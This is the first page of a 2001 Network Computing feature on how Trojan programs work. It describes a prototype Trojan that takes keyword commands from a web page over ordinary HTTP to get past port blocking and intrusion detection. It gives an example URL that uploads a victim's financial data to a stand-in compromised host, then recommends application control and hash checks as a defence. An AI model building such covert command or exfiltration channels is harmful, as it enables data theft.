home news blogs forums events research newsletter whitepapers careers


Network Computing Network Computing Powered by InformationWeek Business Technology Network
InformationWeek 500 Conference -- September 14-16, 2008 Registed Today!

IMMERSE YOURSELF:

SOA

  |

Data Center

  |

802.11n

  |

Data Privacy

  |
APO  |

Virtualization

  |

NAC

  |

Security

  |

Network Mgmt

  |

Enterprise Apps

  |

Storage & Servers


Security
F E A T U R E  
No Desktop is an Island

  November 12, 2001
  By Michael J. DeMaria

Online Only: How Trojan Viruses Work -- A New Wrinkle

Traditionally, Trojan programs wait for incoming connections to the compromised machine. Because the Trojan is just a regular program, it has full access to whatever a normal program can do: It can read files, delete files, access the network, upload files and so forth. You rely on an antivirus program to find and disinfect a Trojan, and use a firewall to control and contain it. On a corporate firewall, you block all the unnecessary ports (both in and out), and limit the destination of incoming connections.

On a desktop machine, you can set it up so all incoming connections are dropped. This will defeat most inbound Trojan programs, such as BackOrifice or Sub 7. But now there's a new method available that gets around port blocking and intrusion detection: Make an outbound connection to an already compromised machine using legitimate network traffic.

The idea of an outbound connection with legitimate traffic is something I came up with over the past year. I don't have any experience with network coding or Winsock programming, so for this project I was assisted by Ifeanyi Echeruo in developing a Trojan program we dubbed "Sheepshank." It took Echeruo, a graduate student in the Engineering College at Syracuse University, less than three hours to get a working prototype of Sheepshank up and running. When run, this program makes an HTTP get request to a Web server, just like Netscape Communicator or Microsoft Internet Explorer would do. The Web server returns a Web page, which has keywords in it. For example, the page may say "<html><body>clearwallpaper</body></html>." The Trojan ignores the parts that it doesn't understand, and sees the keyword clearwallpaper. Source code, precompiled binaries and example usage is available at nwc.syr.edu/~mdemaria/sheepshank.

While clearing the wallpaper may sound trivial, there are many other things you can do. For example, you can upload the contents of c:\quicken\myfinancialdata in segments by using "http://www.compromised.comp/upload.cgi?
file=myfinancialdata&payload=AAD3B4351404EE" and just have a cgi script on the compromised machine piece the chunks together. If a network analyzer is used, it all looks like normal HTTP and HTML traffic. And if you select the keywords carefully, and change some of the command strings, then intrusion-detection systems would have a very difficult time stopping it. Because this is all valid Web traffic, there's very little chance you'll want to block outbound Port 80. This technique is more traceable than most Trojans, because it requires an already compromised machine. A savvy intruder will have the messages bounce around multiple locations on the Internet to avoid being traced.

What's the solution? Well, you must go beyond port blocking and intrusion detection, and that next step is in application control. You should specify which programs on each machine are allowed to access the network. Furthermore, be sure there's a way to check application integrity, otherwise it's possible to bundle a Trojan onto an approved application. Many vendors accomplish this by doing an MD5 hash on the executable -- if the executable is modified, the hashes won't match up.


   Page: 1 | 2 | 3 | 4 | 5 | 6 | Next Page





Ready to take that job and shove it?

Function:

Keyword(s):

State:
SPONSOR
RECENT JOB POSTINGS
CAREER NEWS
Go beyond Google and get vertical. These specialized search sites will help you find the business information you need -- fast.

Ari Balogh was named to the post of chief technology officer as the companys for a "realignment" of employees.










InformationWeek U.S. IT Salary Survey 2008
Salaries for business technology professionals are falling. Here's what you need to know in order to make good hiring decisions and personal career choices. Download Today
 
ROLLING RIGHT ALONG
Follow key Network Computing Reviews from conception to completion. This Week: Holistic APM.



Network Computing Reports Emerging Enterprise Podcast Series: Secrets to Success








TechSearch


Microsite of the Week


Powerful Information at Your Fingertips



InformationWeek Business Technology Network
InformationWeekInformationWeek 500InformationWeek 500 ConferenceInformationWeek AnalyticsInformationWeek CIO
InformationWeek EventsInformationWeek ReportsInformationWeek MagazinebMightyByte and SwitchDark Reading
Digital LibraryIntelligent EnterpriseInternet EvolutionNetwork ComputingNo Jitter
space
Techweb Events Network
InteropVoiceConWeb 2.0 ExpoWeb 2.0 SummitEnterprise 2.0 ConferenceMobile Business ExpoSoftware ConferenceCSI - Computer Security Institute
Black HatGTECEnergy CampMashup CampStartup Camp
space
Light Reading Communications Network
Light ReadingLight Reading EuropeUnstrungLight Reading's Cable Digital NewsConstantinopleInternet Evolution
Heavy ReadingLight Reading Live!Light Reading InsiderEthernet ExpoOptical ExpoTeleco TVTower Technology Summit
space
Financial Technology Network
Advanced TradingBank Systems & TechnologyInsurance & TechnologyWall Street & TechnologyAccelerating Wall StreetBank Systems & Technology Executive SummitBuyside Trading SummitInsurance & Technology Executive Summit
space
Microsoft Technology Network
MSDN MagazineTechNetThe Architecture Journal
space
App Infrastructure   |   Messaging & Collaboration   |   Network & Systems Mgmt   |   Network Infrastructure   |   Security  |   Storage & Servers   |   Wireless   |   Enterprise Apps
About Us  |  Contact Us  |  Site Map  |  Technology Marketing Solutions  |   Briefing Centers
Copyright © 2008  United Business Media LLC  |  Privacy Statement  |  Terms of Service  |  Your California Privacy Rights